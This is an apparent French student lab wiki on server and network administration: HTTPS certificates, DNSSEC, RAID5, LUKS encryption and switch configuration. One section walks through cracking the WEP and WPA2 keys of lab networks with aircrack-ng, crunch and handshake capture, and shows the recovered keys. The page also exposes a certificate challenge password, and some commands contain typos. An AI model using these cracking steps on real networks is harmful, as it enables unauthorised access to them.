      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef =====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
